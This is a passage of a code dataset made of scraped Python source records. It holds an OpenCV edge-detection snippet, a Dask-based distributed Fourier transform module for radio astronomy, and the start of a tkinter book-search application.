cv2.imread(r'lena.bmp',0)\n\n\n# In[7]:\n\n\n# Laplacian edge detection\nlap = cv2.Laplacian(image,cv2.CV_64F)# Laplacian edge detection\nlap = np.uint8(np.absolute(lap))# take the absolute value of lap\n\ncv2ShowImages([image,lap])\n\n\n# In[8]:\n\n\n# Sobel edge detection\nsobelX = cv2.Sobel(image,cv2.CV_64F,1,0)# gradient in the x direction\nsobelY = cv2.Sobel(image,cv2.CV_64F,0,1)# gradient in the y direction\n\nsobelX = np.uint8(np.absolute(sobelX))# absolute value of the x gradient\nsobelY = np.uint8(np.absolute(sobelY))# absolute value of the y gradient\n\nsobelCombined = cv2.bitwise_or(sobelX,sobelY)# OR the two edge maps together\n\ncv2ShowImages([image,sobelX,sobelY,sobelCombined])\n\n\n# In[9]:\n\n\n# Canny edge detection\ncanny = cv2.Canny(image,30,150)\ncv2ShowImages([image,canny])\n\n","repo_name":"ZX1209/python-opencv","sub_path":"多媒体技术/python-多媒体技术-边缘检测.py","file_name":"python-多媒体技术-边缘检测.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34991187758","text":"#!/usr/bin/env python\n# coding: utf-8\n# pylint: disable=too-many-locals, too-many-arguments\n\"\"\"\nMain algorithm routine.\nThe functions that conduct the main Dask-implemented algorithm\ninclude the subgrid to facet, and facet to subgrid transformations.\nThe main function calls all the functions.\n\"\"\"\n\nimport argparse\nimport itertools\nimport logging\nimport os\nimport sys\nimport time\n\nimport dask\nimport dask.array\nimport numpy\nfrom distributed import performance_report\nfrom matplotlib import pylab\n\nfrom .dask_wrapper import 
set_up_dask, tear_down_dask\nfrom .fourier_transform import (\n make_subgrid_and_facet,\n make_subgrid_and_facet_from_hdf5,\n make_subgrid_and_facet_from_sources,\n)\nfrom .fourier_transform.algorithm_parameters import (\n BaseArrays,\n StreamingDistributedFFT,\n)\nfrom .swift_configs import SWIFT_CONFIGS\nfrom .utils import (\n add_two,\n errors_facet_to_subgrid_2d,\n errors_facet_to_subgrid_2d_dask,\n errors_subgrid_to_facet_2d,\n errors_subgrid_to_facet_2d_dask,\n generate_input_data,\n plot_pswf,\n plot_work_terms,\n write_hdf5,\n)\n\nlog = logging.getLogger(\"fourier-logger\")\nlog.setLevel(logging.INFO)\nlog.addHandler(logging.StreamHandler(sys.stdout))\n\n# Plot setup\npylab.rcParams[\"figure.figsize\"] = 16, 4\npylab.rcParams[\"image.cmap\"] = \"viridis\"\n\n\ndef _generate_subgrid_contributions(\n subgrid_2, distr_fft_class, base_arrays, use_dask\n):\n \"\"\"\n Generate the array of individual subgrid contributions to each facet.\n\n :param subgrid_2: 2D numpy array of subgrids\n :param distr_fft_class: StreamingDistributedFFT class\n :param base_arrays: BaseArrays class\n :param use_dask: use dask.delayed or not\n\n :return: subgrid contributions\n \"\"\"\n subgrid_contrib = numpy.empty(\n (\n distr_fft_class.nsubgrid,\n distr_fft_class.nsubgrid,\n distr_fft_class.nfacet,\n distr_fft_class.nfacet,\n distr_fft_class.xM_yN_size,\n distr_fft_class.xM_yN_size,\n ),\n dtype=complex,\n )\n if use_dask:\n subgrid_contrib = subgrid_contrib.tolist()\n for i0, i1 in itertools.product(\n range(distr_fft_class.nsubgrid), range(distr_fft_class.nsubgrid)\n ):\n AF_AF = distr_fft_class.prepare_subgrid(\n subgrid_2[i0][i1],\n use_dask=use_dask,\n nout=1,\n )\n for j0 in range(distr_fft_class.nfacet):\n NAF_AF = distr_fft_class.extract_subgrid_contrib_to_facet(\n AF_AF,\n distr_fft_class.facet_off[j0],\n base_arrays.Fn,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n for j1 in range(distr_fft_class.nfacet):\n subgrid_contrib[i0][i1][j0][\n j1\n ] = distr_fft_class.extract_subgrid_contrib_to_facet(\n NAF_AF,\n distr_fft_class.facet_off[j1],\n base_arrays.Fn,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n return subgrid_contrib\n\n\ndef subgrid_to_facet_algorithm(\n subgrid_2,\n distr_fft_class,\n base_arrays,\n use_dask=False,\n):\n \"\"\"\n Generate facets from subgrids.\n\n :param subgrid_2: 2D numpy array of subgrids\n :param distr_fft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class\n :param use_dask: use dask.delayed or not\n\n :return: numpy array of approximate facets\n \"\"\"\n naf_naf = _generate_subgrid_contributions(\n subgrid_2,\n distr_fft_class,\n base_arrays,\n use_dask,\n )\n\n approx_facet = numpy.empty(\n (\n distr_fft_class.nfacet,\n distr_fft_class.nfacet,\n distr_fft_class.yB_size,\n distr_fft_class.yB_size,\n ),\n dtype=complex,\n )\n if use_dask:\n approx_facet = approx_facet.tolist()\n\n for j0, j1 in itertools.product(\n range(distr_fft_class.nfacet), range(distr_fft_class.nfacet)\n ):\n if use_dask:\n MNAF_BMNAF = None\n else:\n MNAF_BMNAF = numpy.zeros(\n (distr_fft_class.yP_size, distr_fft_class.yB_size),\n dtype=complex,\n )\n for i0 in range(distr_fft_class.nsubgrid):\n if use_dask:\n NAF_MNAF = None\n else:\n NAF_MNAF = numpy.zeros(\n (distr_fft_class.xM_yN_size, distr_fft_class.yP_size),\n dtype=complex,\n )\n for i1 in range(distr_fft_class.nsubgrid):\n if use_dask:\n tmp_NAF_MNAF = distr_fft_class.add_subgrid_contribution(\n naf_naf[i0][i1][j0][j1],\n distr_fft_class.subgrid_off[i1],\n base_arrays.facet_m0_trunc,\n axis=1,\n 
use_dask=use_dask,\n nout=1,\n )\n NAF_MNAF = add_two(\n NAF_MNAF, tmp_NAF_MNAF, use_dask=use_dask, nout=1\n )\n else:\n NAF_MNAF = (\n NAF_MNAF\n + distr_fft_class.add_subgrid_contribution(\n naf_naf[i0][i1][j0][j1],\n distr_fft_class.subgrid_off[i1],\n base_arrays.facet_m0_trunc,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n )\n NAF_BMNAF = distr_fft_class.finish_facet(\n NAF_MNAF,\n base_arrays.facet_B[j1],\n base_arrays.Fb,\n axis=1,\n use_dask=use_dask,\n nout=0,\n )\n if use_dask:\n tmp_MNAF_BMNAF = distr_fft_class.add_subgrid_contribution(\n NAF_BMNAF,\n distr_fft_class.subgrid_off[i0],\n base_arrays.facet_m0_trunc,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n MNAF_BMNAF = add_two(\n MNAF_BMNAF, tmp_MNAF_BMNAF, use_dask=use_dask, nout=1\n )\n else:\n MNAF_BMNAF = (\n MNAF_BMNAF\n + distr_fft_class.add_subgrid_contribution(\n NAF_BMNAF,\n distr_fft_class.subgrid_off[i0],\n base_arrays.facet_m0_trunc,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n )\n approx_facet[j0][j1] = distr_fft_class.finish_facet(\n MNAF_BMNAF,\n base_arrays.facet_B[j0],\n base_arrays.Fb,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n\n return approx_facet\n\n\ndef facet_to_subgrid_2d_method_1(\n facet,\n distr_ft_class,\n base_arrays,\n use_dask=False,\n):\n \"\"\"\n Generate subgrid from facet 2D. 1st Method.\n\n Approach 1: do prepare_facet step across both axes first,\n then go into the loop over subgrids horizontally\n (axis=0) and within that, loop over subgrids\n vertically (axis=1) and do the extract_subgrid\n step in these two directions\n\n Having those operations separately means that we can shuffle\n things around quite a bit without affecting the result.\n The obvious first choice might be to do all facet-preparation\n up-front, as this allows us to share the computation across all subgrids\n\n :param facet: 2D numpy array of facets\n :param distr_ft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class object\n :param use_dask: use dask.delayed or not\n\n :return: approximate subgrid array (subgrids derived from facets)\n \"\"\"\n\n NMBF_NMBF = numpy.empty(\n (\n distr_ft_class.nsubgrid,\n distr_ft_class.nsubgrid,\n distr_ft_class.nfacet,\n distr_ft_class.nfacet,\n distr_ft_class.xM_yN_size,\n distr_ft_class.xM_yN_size,\n ),\n dtype=complex,\n )\n if use_dask:\n NMBF_NMBF = NMBF_NMBF.tolist()\n\n for j0, j1 in itertools.product(\n range(distr_ft_class.nfacet), range(distr_ft_class.nfacet)\n ):\n BF_F = distr_ft_class.prepare_facet(\n facet[j0][j1],\n base_arrays.Fb,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n BF_BF = distr_ft_class.prepare_facet(\n BF_F,\n base_arrays.Fb,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n for i0 in range(distr_ft_class.nsubgrid):\n NMBF_BF = distr_ft_class.extract_facet_contrib_to_subgrid(\n BF_BF,\n distr_ft_class.subgrid_off[i0],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n for i1 in range(distr_ft_class.nsubgrid):\n NMBF_NMBF[i0][i1][j0][\n j1\n ] = distr_ft_class.extract_facet_contrib_to_subgrid(\n NMBF_BF,\n distr_ft_class.subgrid_off[i1],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n\n approx_subgrid = generate_approx_subgrid(\n NMBF_NMBF, distr_ft_class, base_arrays, use_dask=use_dask\n )\n\n return approx_subgrid\n\n\ndef facet_to_subgrid_2d_method_2(\n facet,\n distr_fft_class,\n base_arrays,\n use_dask=False,\n):\n \"\"\"\n Approach 2: First, do prepare_facet on the horizontal axis\n (axis=0), then for loop for the horizontal 
subgrid direction: do extract_subgrid there, then run\n prepare_facet along the vertical axis (axis=1), and finally loop over the\n vertical subgrids and do extract_subgrid for those.\n\n However, remember that `prepare_facet` increases the amount of data\n involved, which in turn means that we need to shuffle more data through\n subsequent computations. Therefore it is actually more efficient to first\n do the subgrid-specific reduction, and *then* continue with the (constant)\n facet preparation along the other axis. We can tackle both axes in whatever\n order we like, it doesn't make a difference for the result.\n\n :param facet: 2D numpy array of facets\n :param distr_fft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class object\n :param use_dask: use dask.delayed or not\n\n :return: approximate subgrid array (subgrids derived from facets)\n \"\"\"\n NMBF_NMBF = numpy.empty(\n (\n distr_fft_class.nsubgrid,\n distr_fft_class.nsubgrid,\n distr_fft_class.nfacet,\n distr_fft_class.nfacet,\n distr_fft_class.xM_yN_size,\n distr_fft_class.xM_yN_size,\n ),\n dtype=complex,\n )\n if use_dask:\n NMBF_NMBF = NMBF_NMBF.tolist()\n\n for j0, j1 in itertools.product(\n range(distr_fft_class.nfacet), range(distr_fft_class.nfacet)\n ):\n BF_F = distr_fft_class.prepare_facet(\n facet[j0][j1],\n base_arrays.Fb,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n for i0 in range(distr_fft_class.nsubgrid):\n NMBF_F = distr_fft_class.extract_facet_contrib_to_subgrid(\n BF_F,\n distr_fft_class.subgrid_off[i0],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n NMBF_BF = distr_fft_class.prepare_facet(\n NMBF_F,\n base_arrays.Fb,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n for i1 in range(distr_fft_class.nsubgrid):\n NMBF_NMBF[i0][i1][j0][\n j1\n ] = distr_fft_class.extract_facet_contrib_to_subgrid(\n NMBF_BF,\n distr_fft_class.subgrid_off[i1],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n\n approx_subgrid = generate_approx_subgrid(\n NMBF_NMBF, distr_fft_class, base_arrays, use_dask=use_dask\n )\n\n return approx_subgrid
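\n\n# Loop-order note (added): method 1 prepares both facet axes up front, which\n# inflates the data carried into the subgrid loops; methods 2 and 3 interleave\n# the per-subgrid extraction with the second-axis prepare (method 2 walks axis 0\n# first, method 3 axis 1 first). All three produce the same result.\n\n\ndef facet_to_subgrid_2d_method_3(\n facet,\n distr_fft_class,\n base_arrays,\n use_dask=False,\n):\n \"\"\"\n Generate subgrid from facet 2D. 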
3rd Method.\n\n Approach 3: same as 2, but starts with the vertical direction (axis=1)\n and finishes with the horizontal (axis=0) axis\n\n :param facet: 2D numpy array of facets\n :param distr_fft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class object\n :param use_dask: use dask.delayed or not\n\n :return: approximate subgrid array (subgrids derived from facets)\n \"\"\"\n NMBF_NMBF = numpy.empty(\n (\n distr_fft_class.nsubgrid,\n distr_fft_class.nsubgrid,\n distr_fft_class.nfacet,\n distr_fft_class.nfacet,\n distr_fft_class.xM_yN_size,\n distr_fft_class.xM_yN_size,\n ),\n dtype=complex,\n )\n if use_dask:\n NMBF_NMBF = NMBF_NMBF.tolist()\n\n for j0, j1 in itertools.product(\n range(distr_fft_class.nfacet), range(distr_fft_class.nfacet)\n ):\n F_BF = distr_fft_class.prepare_facet(\n facet[j0][j1],\n base_arrays.Fb,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n for i1 in range(distr_fft_class.nsubgrid):\n F_NMBF = distr_fft_class.extract_facet_contrib_to_subgrid(\n F_BF,\n distr_fft_class.subgrid_off[i1],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n BF_NMBF = distr_fft_class.prepare_facet(\n F_NMBF,\n base_arrays.Fb,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n for i0 in range(distr_fft_class.nsubgrid):\n NMBF_NMBF[i0][i1][j0][\n j1\n ] = distr_fft_class.extract_facet_contrib_to_subgrid(\n BF_NMBF,\n distr_fft_class.subgrid_off[i0],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n approx_subgrid = generate_approx_subgrid(\n NMBF_NMBF, distr_fft_class, base_arrays, use_dask=use_dask\n )\n return approx_subgrid\n\n\ndef generate_approx_subgrid(\n NMBF_NMBF, distr_fft_class, base_arrays, use_dask=False\n):\n \"\"\"\n Finish generating subgrids from facets.\n\n :param NMBF_NMBF: array of individual facet contributions\n :param distr_fft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class object\n :param use_dask: use dask.delayed or not\n \"\"\"\n approx_subgrid = numpy.empty(\n (\n distr_fft_class.nsubgrid,\n distr_fft_class.nsubgrid,\n distr_fft_class.xA_size,\n distr_fft_class.xA_size,\n ),\n dtype=complex,\n )\n if use_dask:\n approx_subgrid = approx_subgrid.tolist()\n\n for i0, i1 in itertools.product(\n range(distr_fft_class.nsubgrid), range(distr_fft_class.nsubgrid)\n ):\n summed_facet = numpy.zeros(\n (distr_fft_class.xM_size, distr_fft_class.xM_size), dtype=complex\n )\n if use_dask:\n summed_facet = None\n\n for j0, j1 in itertools.product(\n range(distr_fft_class.nfacet), range(distr_fft_class.nfacet)\n ):\n tmp_axis_0 = distr_fft_class.add_facet_contribution(\n NMBF_NMBF[i0][i1][j0][j1],\n distr_fft_class.facet_off[j0],\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n tmp_facet = distr_fft_class.add_facet_contribution(\n tmp_axis_0,\n distr_fft_class.facet_off[j1],\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n # Add two facets using Dask delayed (if use_dask = True)\n summed_facet = add_two(\n summed_facet, tmp_facet, use_dask=use_dask, nout=1\n )\n\n approx_subgrid[i0][i1] = distr_fft_class.finish_subgrid(\n summed_facet,\n [base_arrays.subgrid_A[i0], base_arrays.subgrid_A[i1]],\n use_dask=use_dask,\n nout=1,\n )\n\n return approx_subgrid\n\n\ndef _run_algorithm(\n subgrid_2,\n facet_2,\n distr_fft_class,\n base_arrays,\n use_dask,\n version_to_run=3,\n):\n \"\"\"\n Run facet-to-subgrid and subgrid-to-facet algorithm.\n\n Facet-to-subgrid has three versions, which iterate through facets\n and subgrids in different ways. 
They differ in how long they run for.\n The three approaches:\n - differ in when facet is prepared and which axis is run first\n - all give the same result, but with a different speed\n - #1 is slowest, because that prepares all facets first,\n which substantially increases their size and hence, puts a\n large amount of data into the following loops\n\n Subgrid-to-facet only has a single version.\n\n :param subgrid_2: 2D numpy array of subgrids\n :param facet_2: 2D numpy array of facets\n :param distr_fft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class object\n :param use_dask: use dask.delayed or not\n :param version_to_run: which facet-to-subgrid version (method)\n to run: 1, 2, or 3 (any other value falls back to 3)\n \"\"\"\n log.info(\n \"%s x %s subgrids %s x %s facets\",\n distr_fft_class.nsubgrid,\n distr_fft_class.nsubgrid,\n distr_fft_class.nfacet,\n distr_fft_class.nfacet,\n )\n\n # ==== Facet to Subgrid ====\n log.info(\"Executing 2D facet-to-subgrid algorithm\")\n\n if version_to_run == 1:\n # Version #1\n t = time.time()\n approx_subgrid = facet_to_subgrid_2d_method_1(\n facet_2,\n distr_fft_class,\n base_arrays,\n use_dask=use_dask,\n )\n log.info(\"%s s\", time.time() - t)\n\n elif version_to_run == 2:\n # Version #2\n t = time.time()\n approx_subgrid = facet_to_subgrid_2d_method_2(\n facet_2,\n distr_fft_class,\n base_arrays,\n use_dask=use_dask,\n )\n log.info(\"%s s\", time.time() - t)\n\n else:\n # Version #3\n t = time.time()\n approx_subgrid = facet_to_subgrid_2d_method_3(\n facet_2,\n distr_fft_class,\n base_arrays,\n use_dask=use_dask,\n )\n log.info(\"%s s\", time.time() - t)\n\n # ==== Subgrid to Facet ====\n log.info(\"Executing 2D subgrid-to-facet algorithm\")\n # Celeste: This is based on the original implementation by Peter,\n # and has not involved data redistribution yet.\n\n t = time.time()\n approx_facet = subgrid_to_facet_algorithm(\n subgrid_2, distr_fft_class, base_arrays, use_dask=use_dask\n )\n log.info(\"%s s\", time.time() - t)\n\n return approx_subgrid, approx_facet\n\n\n# pylint: disable=too-many-arguments\n# TODO: Further refactor to optimise on the pylint errors\ndef run_distributed_fft(\n fundamental_params,\n to_plot=True,\n fig_name=None,\n use_dask=False,\n client=None,\n use_hdf5=False,\n hdf5_prefix=None,\n hdf5_chunksize=None,\n generate_random=False,\n source_number=10,\n facet_to_subgrid_method=3,\n):\n \"\"\"\n Main execution function that reads in the configuration,\n generates the source data, and runs the algorithm.\n\n :param fundamental_params: dictionary of fundamental parameters\n chosen from swift_configs.py\n :param to_plot: run plotting?\n :param fig_name: If given, figures are saved with this prefix into\n PNG files. 
If to_plot is set to False,\n fig_name doesn't have an effect.\n :param use_dask: boolean; use Dask?\n :param client: Dask client or None\n :param use_hdf5: use Hdf5?\n :param hdf5_prefix: hdf5 path prefix\n :param hdf5_chunksize: hdf5 chunk size in tuple [size(G), size(FG)]\n :param generate_random: Whether to generate generic input data\n with random sources\n :param source_number: Number of random sources to add to input data\n :param facet_to_subgrid_method: which method to run\n the facet to subgrid algorithm\n\n :return: subgrid_2, facet_2, approx_subgrid, approx_facet\n when use_hdf5=False\n subgrid_2_file, facet_2_file, approx_subgrid_2_file,\n approx_facet_2_file when use_hdf5=True\n \"\"\"\n base_arrays = BaseArrays(**fundamental_params)\n distr_fft = StreamingDistributedFFT(**fundamental_params)\n\n log.info(\"== Chosen configuration\")\n log.info(distr_fft)\n\n if to_plot:\n plot_pswf(distr_fft, fig_name=fig_name)\n plot_work_terms(distr_fft, fig_name=fig_name)\n\n log.info(\"\\n== Generated layout (facets and subgrids): \\n\")\n log.info(\n \"%s subgrids, %s facets needed to cover the grid and image space\",\n distr_fft.nsubgrid,\n distr_fft.nfacet,\n )\n\n # The branch of using HDF5\n if use_hdf5:\n\n log.info(\"Use HDF5 to generate input data.\")\n hdf5_chunksize_G, hdf5_chunksize_FG = hdf5_chunksize\n G_2_file = f\"{hdf5_prefix}/G_{base_arrays.N}_{hdf5_chunksize_G}.h5\"\n FG_2_file = f\"{hdf5_prefix}/FG_{base_arrays.N}_{hdf5_chunksize_FG}.h5\"\n approx_G_2_file = (\n f\"{hdf5_prefix}/approx_G_{base_arrays.N}_{hdf5_chunksize_G}.h5\"\n )\n approx_FG_2_file = (\n f\"{hdf5_prefix}/approx_FG_{base_arrays.N}_{hdf5_chunksize_FG}.h5\"\n )\n\n for hdf5_file in [G_2_file, FG_2_file]:\n if os.path.exists(hdf5_file):\n log.info(\"Using hdf5 file: %s\", hdf5_file)\n else:\n raise FileNotFoundError(\n f\"Please check if the hdf5 data is in the {hdf5_file}\"\n )\n\n subgrid_2, facet_2 = make_subgrid_and_facet_from_hdf5(\n G_2_file,\n FG_2_file,\n base_arrays,\n use_dask=use_dask,\n )\n approx_subgrid, approx_facet = _run_algorithm(\n subgrid_2,\n facet_2,\n distr_fft,\n base_arrays,\n use_dask=use_dask,\n version_to_run=facet_to_subgrid_method,\n )\n\n errors_facet_to_subgrid = errors_facet_to_subgrid_2d_dask(\n approx_subgrid,\n distr_fft,\n subgrid_2,\n use_dask=use_dask,\n )\n\n errors_subgrid_to_facet = errors_subgrid_to_facet_2d_dask(\n approx_facet,\n facet_2,\n distr_fft,\n use_dask=use_dask,\n )\n\n approx_G_2_file, approx_FG_2_file = write_hdf5(\n approx_subgrid,\n approx_facet,\n approx_G_2_file,\n approx_FG_2_file,\n base_arrays,\n hdf5_chunksize_G,\n hdf5_chunksize_FG,\n use_dask=use_dask,\n )\n\n if use_dask:\n (\n errors_facet_to_subgrid,\n errors_subgrid_to_facet,\n approx_G_2_file,\n approx_FG_2_file,\n ) = dask.compute(\n errors_facet_to_subgrid,\n errors_subgrid_to_facet,\n approx_G_2_file,\n approx_FG_2_file,\n sync=True,\n )\n\n log.info(\n \"errors_facet_to_subgrid RMSE: %s (image: %s)\",\n errors_facet_to_subgrid[0],\n errors_facet_to_subgrid[1],\n )\n\n log.info(\n \"errors_subgrid_to_facet RMSE: %s (image: %s)\",\n errors_subgrid_to_facet[0],\n errors_subgrid_to_facet[1],\n )\n\n return G_2_file, FG_2_file, approx_G_2_file, approx_FG_2_file\n\n if generate_random:\n\n log.info(\n \"Make subgrid and facet using random %s sources\", source_number\n )\n\n G_2, FG_2 = generate_input_data(distr_fft, source_count=source_number)\n\n if use_dask and client is not None:\n G_2 = client.scatter(G_2)\n FG_2 = client.scatter(FG_2)\n subgrid_2, facet_2 = 
make_subgrid_and_facet(\n G_2,\n FG_2,\n base_arrays, # still uses the BaseArrays object\n dims=2,\n use_dask=use_dask,\n )\n else:\n log.info(\n \"Make subgrid and facet using just one source. \"\n \"For scaling test purposes only.\"\n )\n sources = [(1, 1, 0)]\n subgrid_2, facet_2 = make_subgrid_and_facet_from_sources(\n sources, base_arrays, use_dask=use_dask\n )\n\n if use_dask:\n approx_subgrid, approx_facet = _run_algorithm(\n subgrid_2,\n facet_2,\n distr_fft,\n base_arrays,\n use_dask=True,\n version_to_run=facet_to_subgrid_method,\n )\n\n subgrid_2, facet_2, approx_subgrid, approx_facet = dask.compute(\n subgrid_2, facet_2, approx_subgrid, approx_facet, sync=True\n )\n\n subgrid_2 = numpy.array(subgrid_2)\n facet_2 = numpy.array(facet_2)\n approx_subgrid = numpy.array(approx_subgrid)\n approx_facet = numpy.array(approx_facet)\n\n else:\n approx_subgrid, approx_facet = _run_algorithm(\n subgrid_2,\n facet_2,\n distr_fft,\n base_arrays,\n use_dask=False,\n version_to_run=facet_to_subgrid_method,\n )\n\n errors_facet_to_subgrid_2d(\n approx_subgrid,\n distr_fft,\n subgrid_2,\n to_plot=to_plot,\n fig_name=fig_name,\n )\n\n errors_subgrid_to_facet_2d(\n approx_facet,\n facet_2,\n distr_fft,\n to_plot=to_plot,\n fig_name=fig_name,\n )\n\n return subgrid_2, facet_2, approx_subgrid, approx_facet\n\n\ndef cli_parser():\n \"\"\"\n Parse command line arguments\n\n :return: argparse\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Distributed Fast Fourier Transform\",\n fromfile_prefix_chars=\"@\",\n )\n parser.add_argument(\n \"--swift_config\",\n type=str,\n default=\"1k[1]-n512-256\",\n help=\"Dictionary key from swift_configs.py corresponding \"\n \"to the configuration we want to run the algorithm for. \"\n \"If a comma-separated list of strings is given, the code \"\n \"will iterate through each key. \"\n \"e.g. '12k[1]-n6k-512,10k[1]-n5k-512,8k[1]-n4k-512'\",\n )\n\n parser.add_argument(\n \"--use_hdf5\",\n type=str,\n default=\"False\",\n help=\"use HDF5 to save G/FG and approx G/FG at large scale\",\n )\n\n parser.add_argument(\n \"--hdf5_chunksize\",\n type=int,\n default=256,\n help=\"hdf5 chunksize for G and FG\",\n )\n\n parser.add_argument(\n \"--hdf5_prefix\", type=str, default=\"./\", help=\"hdf5 path prefix\"\n )\n\n parser.add_argument(\n \"--generate_random_sources\",\n type=str,\n default=\"False\",\n help=\"Whether to generate generic input data with random sources\",\n )\n\n parser.add_argument(\n \"--source_number\",\n type=int,\n default=10,\n help=\"Number of random sources to add to input data\",\n )\n\n parser.add_argument(\n \"--facet_to_subgrid_method\",\n type=str,\n default=\"3\",\n help=\"which facet to subgrid method to run. \"\n \"Options are 1, 2 and 3; see documentation for details\",\n )\n\n return parser\n\n\ndef main(args):\n \"\"\"\n Main function to run the Distributed FFT\n \"\"\"\n # Fixing seed of numpy random\n numpy.random.seed(123456789)\n\n scheduler = os.environ.get(\"DASK_SCHEDULER\", None)\n log.info(\"Scheduler: %s\", scheduler)\n\n swift_config_keys = args.swift_config.split(\",\")\n # check that all the keys are valid\n for c in swift_config_keys:\n try:\n SWIFT_CONFIGS[c]\n except KeyError as error:\n raise KeyError(\n f\"Provided argument ({c}) does not match any swift \"\n f\"configuration keys. Please consult src/swift_configs.py \"\n f\"for available options.\"\n ) from error\n\n try:\n version = int(args.facet_to_subgrid_method)\n except ValueError:\n log.info(\"Invalid facet to subgrid method. 
Use default instead.\")\n version = 3\n\n dask_client = set_up_dask(scheduler_address=scheduler)\n\n for config_key in swift_config_keys:\n log.info(\"Running for swift-config: %s\", config_key)\n\n with performance_report(filename=f\"dask-report-{config_key}.html\"):\n run_distributed_fft(\n SWIFT_CONFIGS[config_key],\n to_plot=False,\n use_dask=True,\n client=dask_client,\n use_hdf5=args.use_hdf5 == \"True\",\n hdf5_prefix=args.hdf5_prefix,\n hdf5_chunksize=[args.hdf5_chunksize, args.hdf5_chunksize],\n generate_random=args.generate_random_sources == \"True\",\n source_number=args.source_number,\n facet_to_subgrid_method=version,\n )\n dask_client.restart()\n tear_down_dask(dask_client)\n\n\nif __name__ == \"__main__\":\n dfft_parser = cli_parser()\n parsed_args = dfft_parser.parse_args()\n main(parsed_args)\n","repo_name":"ska-telescope/ska-sdp-distributed-fourier-transform","sub_path":"src/ska_sdp_exec_swiftly/fourier_transform_dask.py","file_name":"fourier_transform_dask.py","file_ext":"py","file_size_in_byte":30428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23427531434","text":"import webbrowser\n\nfrom Manager import *\nfrom windows.AboutWindow import *\nfrom windows.HelpWindow import *\nfrom windows.SettingsWindow import *\nfrom windows.Alerts import *\n\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom tkinter import filedialog\n\n\nclass MainApp(tk.Tk):\n def __init__(self):\n super().__init__()\n\n self.download_alert = None\n self.selected_row_id = None\n self.current_query = None\n self.current_query_type = None\n self.search_results = {}\n self.search_IDs = {}\n\n self.title(Manager.get_title())\n self.geometry(f'1024x768+433+150')\n\n self.queryType = tk.IntVar()\n\n self.__add_components()\n self.__configure_components()\n\n def __add_components(self):\n # Menu\n self.mMenu = tk.Menu(self)\n self.mMenu.add_cascade(label=Manager.get_name('settings'), command=self.settings_window)\n self.mMenu.add_cascade(label=Manager.get_name('help'), command=self.help_window)\n self.mMenu.add_cascade(label=Manager.get_name('about'), command=self.about_window)\n\n # Frame 1\n self.frame1 = tk.Frame(self)\n\n self.lQuery = tk.Label(self.frame1, text=Manager.get_name('query'))\n self.eQuery = tk.Entry(self.frame1)\n self.bSearch = tk.Button(self.frame1, text=Manager.get_name('search'), command=self.on_button_search)\n self.lType = tk.Label(self.frame1, text=Manager.get_name('type'))\n\n # Frame 2\n self.frame2 = tk.Frame(self.frame1)\n self.rAuthor = tk.Radiobutton(self.frame2, text=Manager.get_name('author'), variable=self.queryType,\n value=QueryType.AUTHOR.value)\n self.rBook = tk.Radiobutton(self.frame2, text=Manager.get_name('book'), variable=self.queryType,\n value=QueryType.BOOK.value)\n\n # Frame 3\n self.frame3 = tk.Frame(self)\n self.lResults = tk.Label(self.frame3, text=Manager.get_name('results'))\n self.tResults = tk.ttk.Treeview(self.frame3, show='headings',\n columns=('1', Manager.get_name('author'), Manager.get_name('book')))\n self.scrollResults = tk.Scrollbar(self.tResults, orient=tk.VERTICAL, command=self.tResults.yview)\n\n # Frame 4\n self.frame4 = tk.Frame(self)\n self.lStatus = tk.Label(self.frame4, text=Manager.get_name('ready'))\n self.bDownloadSelected = tk.Button(self.frame4, text=Manager.get_name('downloadSelected'),\n command=self.on_download_selected)\n\n def __configure_components(self):\n self.config(menu=self.mMenu)\n\n # Frame 1\n self.lQuery.grid(row=0, 
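A minimal sketch of driving the run_distributed_fft entry point from the fourier_transform_dask.py record above directly, without the CLI. The import paths and the config key are assumptions inferred from the record's sub_path and the CLI default, not confirmed by the source:

# Hedged usage sketch; module paths and the config key are assumptions.
from ska_sdp_exec_swiftly.fourier_transform_dask import run_distributed_fft
from ska_sdp_exec_swiftly.swift_configs import SWIFT_CONFIGS

subgrid_2, facet_2, approx_subgrid, approx_facet = run_distributed_fft(
    SWIFT_CONFIGS["1k[1]-n512-256"],  # same key the CLI uses by default
    to_plot=False,           # skip the PSWF / work-term plots
    use_dask=False,          # run serially; no Dask client needed
    generate_random=False,   # single-source test-data branch
)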
